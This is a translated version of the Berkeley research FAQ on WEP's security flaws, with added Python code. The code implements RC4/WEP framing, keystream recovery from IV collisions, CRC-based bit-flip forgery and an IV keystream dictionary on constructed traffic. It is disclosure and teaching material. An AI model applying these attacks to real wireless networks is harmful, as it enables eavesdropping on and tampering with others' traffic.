Translated from http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
Security of the WEP algorithm
This article describes some of our analysis of the Wired Equivalent Privacy protocol (WEP, part of the 802.11 standard), work done jointly by Nikita Borisov, Ian Goldberg, and David Wagner. If you have any questions, please contact us via [email protected].
Executive Summary
We have discovered a number of flaws in WEP that seriously undermine the security claims of the system. Specifically, we found the following types of attacks:
- Passive attacks that decrypt traffic, based on statistical analysis.
- Active attacks that inject new traffic from unauthorized mobile stations, based on known plaintext.
- Active attacks that decrypt traffic by tricking the access point.
- A dictionary-building attack that, after analysis of about a day's worth of traffic, allows real-time automated decryption of all traffic.
Our analysis suggests that all of these attacks are practical to mount using only inexpensive off-the-shelf equipment. We recommend that anyone using an 802.11 wireless network not rely on WEP for security, and employ other security measures to protect their wireless network.
Note that our attacks apply to both 40-bit and 128-bit WEP. They also apply to networks that use the 802.11b standard (802.11b is an extension of 802.11 that supports higher data rates but leaves the WEP protocol unchanged).
Introduction to WEP
The 802.11 standard defines a communication specification for wireless LANs. The Wired Equivalent Privacy (WEP) protocol is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network; this function is not an explicit goal of the 802.11 standard, but it is frequently considered a feature of WEP.
WEP relies on a secret key shared between a mobile station (for example, a laptop with a wireless card) and an access point (i.e. a base station). The key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit. The standard does not specify how the shared key is established. In practice, most installations use a single key shared between all mobile stations and access points. More sophisticated key management techniques can help defend against the attacks we describe; however, as far as we know, no commercial product supports them.
The next two sections describe the problems in the protocol and the technical details of the attacks; they assume some background in cryptographic protocols. You may wish to skip ahead to the later sections, which discuss the practicality of the attacks.
Problems
WEP uses the RC4 encryption algorithm, a stream cipher. A stream cipher works by expanding a short key into an infinite pseudo-random key stream. The sender XORs the key stream with the plaintext to produce ciphertext. The receiver has a copy of the same short key and uses it to generate an identical key stream; XORing the key stream with the ciphertext yields the original plaintext.
This mode of operation makes stream ciphers vulnerable to several attacks. If an attacker flips a bit in the ciphertext, the corresponding bit of the plaintext is flipped on decryption. Also, if an eavesdropper intercepts two ciphertexts encrypted with the same key stream, he can obtain the XOR of the two plaintexts. Knowledge of this XOR enables statistical attacks to recover the plaintexts, and these attacks become increasingly practical as more ciphertexts encrypted with the same key stream are intercepted. Once one of the plaintexts is known, recovering all the others is trivial.
WEP has defenses against both of these attacks. To ensure that a packet has not been modified in transit, it uses an Integrity Check (IC) field in the packet. To avoid encrypting two packets with the same key stream, an Initialization Vector (IV) is combined with the shared secret key to produce a different RC4 key for each packet; the IV is also included in the packet. However, both of these measures are implemented incorrectly, resulting in poor security.
The integrity check field is implemented as a CRC-32 checksum, which is part of the encrypted payload of the packet. However, CRC-32 is linear, which means that the bit difference between the CRCs of two messages can be computed from the bit difference between the messages themselves. In other words, flipping bit n in the message determines exactly which bits of the CRC must be flipped so that the checksum is still correct for the modified message. Because bit flips in the ciphertext carry through RC4 decryption into the plaintext, this allows an attacker to flip arbitrary bits in an encrypted message and correctly adjust its encrypted checksum, so that the resulting message appears valid to the receiver.
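As an added illustration (not code from the original page), the following Python checks the linearity property a WEP forger relies on, using zlib's CRC-32 (the same polynomial as the ICV) on constructed random messages: the correction to the checksum for a given set of bit flips depends only on the flip pattern and the message length, never on the message contents, so it can be computed for a packet the attacker cannot read.

```python
"""CRC-32 linearity, the property that lets a WEP forger patch the ICV.
Added example, not code from the original page; uses zlib.crc32 (the same
polynomial as WEP's ICV) on constructed random messages."""
import os
import zlib


def crc32(data: bytes) -> int:
    """CRC-32 as computed for the WEP integrity check value (ICV)."""
    return zlib.crc32(data) & 0xFFFFFFFF


def icv_mask(delta: bytes) -> int:
    """XOR mask to apply to a CRC when its message is XORed with `delta`.
    CRC-32 is affine over GF(2):  crc(m ^ d) == crc(m) ^ crc(d) ^ crc(0...0)
    for equal-length m and d, so the mask depends on d alone, not on m."""
    return crc32(delta) ^ crc32(bytes(len(delta)))


def flip_bits(msg: bytes, crc: int, delta: bytes) -> tuple:
    """Apply `delta` to a message and patch its CRC without recomputing it
    from the (possibly unknown) message contents."""
    assert len(delta) == len(msg)
    new_msg = bytes(a ^ b for a, b in zip(msg, delta))
    return new_msg, crc ^ icv_mask(delta)


def single_bit_delta(length: int, bit_index: int) -> bytes:
    """A delta flipping only bit `bit_index` (0 = MSB of byte 0) of a
    `length`-byte message."""
    d = bytearray(length)
    d[bit_index // 8] = 0x80 >> (bit_index % 8)
    return bytes(d)


def check_linearity(length: int = 64, trials: int = 200) -> bool:
    """On random messages: (1) the patched CRC always verifies, and (2) the
    CRC change caused by flipping a fixed bit is the same for every message
    (it is exactly icv_mask of that flip), which is what lets an attacker
    patch the ICV of a packet he cannot read."""
    for _ in range(trials):
        m, d = os.urandom(length), os.urandom(length)
        new_m, new_crc = flip_bits(m, crc32(m), d)
        if crc32(new_m) != new_crc:
            return False
    flip37 = single_bit_delta(length, 37)
    observed = set()
    for _ in range(trials):
        m = os.urandom(length)
        observed.add(crc32(m) ^ crc32(flip_bits(m, 0, flip37)[0]))
    return observed == {icv_mask(flip37)}
```

Because the checksum is encrypted with the same key stream as the payload, the attacker applies `delta` and the four-byte `icv_mask(delta)` directly to the ciphertext; the receiver decrypts to the modified message with a checksum that still verifies.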
The initialization vector in WEP is a 24-bit field sent in the clear as part of the message. Such a small space of initialization vectors guarantees that the same key stream will be reused. A busy access point that constantly sends 1500-byte packets at 11 Mbps exhausts the IV space after 1500 * 8 / (11 * 10^6) * 2^24 = ~18000 seconds, or about 5 hours. (The time may be even shorter, since many packets are smaller than 1500 bytes.) This allows an attacker to collect ciphertexts encrypted with the same key stream and recover the plaintext through statistical analysis. Worse, when all mobile stations use the same key, the chance of an IV collision is even higher. For example, a common Lucent wireless card resets the IV to 0 each time the card is initialized and increments it by 1 with every packet sent, so two cards inserted at roughly the same time provide an attacker with an abundance of IV collisions. (Worse still, the 802.11 standard specifies that changing the IV with each packet is optional!)
Attacks
Passive attack to decrypt traffic
The first attack follows directly from the observations above. A passive eavesdropper can intercept all wireless traffic until an IV collision occurs. By XORing two ciphertexts encrypted with the key stream generated by the same IV, the attacker obtains the XOR of the two plaintext messages, which can be used to infer their contents. IP traffic is often very predictable and includes a lot of redundancy, and this redundancy eliminates many possibilities for the contents of the messages. Further educated guesses about the contents of one or both messages statistically narrow the space of candidate plaintexts, and in some cases the exact contents can be determined.
When statistical analysis based on only two messages is inconclusive, the attacker can look for more collisions of the same IV. With only a small additional investment of time, it is possible to recover a modest number of packets encrypted with the same key stream, and the success rate of the statistical analysis grows quickly. Once the entire plaintext of one of the messages is recovered, the plaintext of every other message encrypted with the same IV follows directly, since all the pairwise XORs are known.
An extension of this attack uses a host somewhere on the Internet to send traffic from outside to a host on the wireless network. The contents of such traffic are known to the attacker, yielding known plaintext. When the attacker intercepts the encrypted version of his own message as it is sent over 802.11, he can decrypt all packets that use the same initialization vector.
Active attack to inject traffic
The following attack is also a direct consequence of the problems described in the previous section. Suppose an attacker knows the exact plaintext of one encrypted message. He can use this knowledge to construct correctly encrypted packets. The procedure involves constructing a new message, computing its CRC-32, and flipping bits in the original encrypted message so that the plaintext becomes the new message. The basic property is that RC4(X) xor X xor Y = RC4(Y). This packet can now be sent to the access point or a mobile station, and it will be accepted as valid.
A slight modification makes this attack much more insidious. Even without complete knowledge of the packet, it is possible to flip selected bits in a message and correctly adjust the encrypted CRC (as described in the previous section), obtaining a correctly encrypted version of the modified packet. If the attacker has partial knowledge of a packet's contents, he can intercept it and modify it selectively. For example, it is possible to alter commands sent to a shell over a telnet session, or interactions with a file server.
Active attack from both ends
The previous attack can be extended further to decrypt arbitrary traffic. Here the attacker guesses not the contents of the packet but its headers. This information is usually easy to obtain or guess; in particular, all that is needed is the destination IP address. With this knowledge, the attacker flips the appropriate bits to change the destination IP address to that of a machine he controls somewhere on the Internet, and transmits the packet from a rogue mobile station. Most wireless installations have Internet connectivity, so the access point decrypts the packet and forwards it, unencrypted, through the appropriate gateways and routers to the attacker's machine, revealing the plaintext. If the TCP header can also be guessed, it may even be possible to change the destination port to 80, which will let the packet through most firewalls.
Dictionary attack
The small space of initialization vectors allows an attacker to build a decryption table. Once he learns the plaintext of a packet, he can compute the RC4 key stream generated for its IV. This key stream can then be used to decrypt every other packet that uses the same IV. Over time, perhaps using the techniques above, the attacker builds up a table of IVs and their corresponding key streams. The table requires a fairly small amount of storage (~15GB); once it is built, the attacker can decrypt every packet sent over the wireless link.
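The following Python is an added worked example, not code from the original page, that ties together the encapsulation described under Problems and the passive, bit-flipping and dictionary attacks above. The frame layout (3-byte IV prepended to a 40-bit key as the RC4 seed, little-endian CRC-32 ICV appended before encryption, IV sent in the clear ahead of the ciphertext), the key and the packets are all constructed for the example.

```python
"""WEP encapsulation and the attacks above, as an added worked example that is
not code from the original page.  Assumed layout: 24-bit IV prepended to a
40-bit shared key as the RC4 seed, CRC-32 ICV appended to the payload before
encryption, IV sent in clear before the ciphertext.  Keys and packets are
constructed for the example."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key schedule followed by `length` bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload (little-endian here)."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: int, payload: bytes) -> bytes:
    """Frame = IV || (payload || ICV) XOR RC4(IV || key)."""
    iv_bytes = iv.to_bytes(3, "big")
    body = payload + icv(payload)
    return iv_bytes + xor(body, rc4(iv_bytes + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """What a receiver does: decrypt, then accept only if the ICV verifies."""
    iv_bytes, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv_bytes + key, len(ct)))
    payload, tag = body[:-4], body[-4:]
    return payload if icv(payload) == tag else None


# Passive attack: one known plaintext under an IV yields that IV's keystream,
# which decrypts every other frame sent under the same IV (no key needed).
def keystream_from_known_plaintext(frame: bytes, payload: bytes) -> bytes:
    return xor(frame[3:], payload + icv(payload))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Keystream must be at least as long as the encrypted body."""
    return xor(frame[3:], keystream)[:-4]


# Active attack: flip chosen plaintext bits by flipping ciphertext bits, and
# patch the encrypted ICV via CRC-32 linearity, without the key:
# RC4(x) ^ x ^ y = RC4(y)  and  crc(x ^ d) = crc(x) ^ crc(d) ^ crc(0...0).
def forge(frame: bytes, delta: bytes) -> bytes:
    """`delta` has one byte per payload byte; its set bits get flipped."""
    assert len(delta) == len(frame) - 7, "delta must cover the whole payload"
    icv_mask = xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + icv_mask)


def demo() -> dict:
    """Run the attacks on constructed traffic; return what the attacker learns."""
    key = bytes.fromhex("0102030405")          # constructed 40-bit shared key
    out = {}
    # IV collision: the attacker knows pt_a (say, traffic he sent to the victim
    # from the Internet) and wants pt_b, sent by the victim under the same IV.
    iv = 0x00ABCD
    pt_a = b"GET /index.html HTTP/1.0\r\n"
    pt_b = b"PASS hunter2\r\n"
    frame_a, frame_b = wep_encrypt(key, iv, pt_a), wep_encrypt(key, iv, pt_b)
    out["xor_of_plaintexts"] = xor(frame_a[3:], frame_b[3:])  # (pt_a||ICV)^(pt_b||ICV)
    ks = keystream_from_known_plaintext(frame_a, pt_a)
    out["recovered_b"] = decrypt_with_keystream(frame_b, ks)
    # Bit flipping: change "100" to "900" in a frame the attacker cannot read,
    # knowing only where the digit sits; the access point accepts the result.
    frame_c = wep_encrypt(key, 0x123456, b"transfer 100 to bob")
    delta = bytearray(len(frame_c) - 7)
    delta[9] = ord("1") ^ ord("9")
    out["forged"] = wep_decrypt(key, forge(frame_c, bytes(delta)))
    # Dictionary: keystreams learned per IV; a later frame reusing the IV is
    # decrypted immediately.
    table = {iv: ks}
    later = wep_encrypt(key, iv, b"root\r\n")
    out["from_table"] = decrypt_with_keystream(later, table[int.from_bytes(later[:3], "big")])
    return out
```

The redirection attack from both ends is `forge` with the delta placed over the destination IP address bytes of a guessed IP header (the IP header checksum would need adjusting as well); the ICV check in `wep_decrypt` is all the access point performs before forwarding, and it passes.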
Feasibility of the attacks
Although decoding a 2.4 GHz digital signal is difficult in itself, the hardware needed to listen to 802.11 transmissions is readily available to attackers in the form of ordinary consumer 802.11 products. These products have all the necessary monitoring capabilities; all an attacker has to do is convince them to work for him.
Although most 802.11 equipment is designed to discard encrypted content for which it does not have the key, we were able to intercept WEP-encrypted traffic successfully by changing the configuration of the card drivers. Using promiscuous mode, we could make the card's firmware return the ciphertext of unrecognized packets to us for further examination and analysis.
Active attacks (those that require transmitting data, not just listening) appear to be more difficult, but not impossible. Many 802.11 products come with programmable firmware that can be reverse-engineered and modified to give an attacker the ability to inject traffic. Granted, such reverse-engineering is a significant time investment (we have not done it ourselves), but it is important to note that it is a one-time cost. A competent group of people can invest this effort and then distribute the rogue firmware through underground circles, or sell it to parties interested in corporate espionage. The latter is a highly profitable business, so the time invested is easily recouped.
Summary
Wired Equivalent Privacy (WEP) is not secure. The flaws stem from the designers' misunderstanding of cryptographic primitives, which led to their being combined in insecure ways. The attacks presented here demonstrate the importance of public review of cryptographic protocol designs by experts; only then can problems like the ones pointed out here be avoided.
Resources
- Slides from Nikita's talk at the Mac Crypto Workshop (January 30, 2001).
- A paper presented at the 7th Annual International Conference on Mobile Computing and Networking, describing the attacks.
- Bill Arbaugh has a Web page which summarizes many 802.11 security problems.
- Slides from Ian's talk at the Black Hat briefings (July, 2001).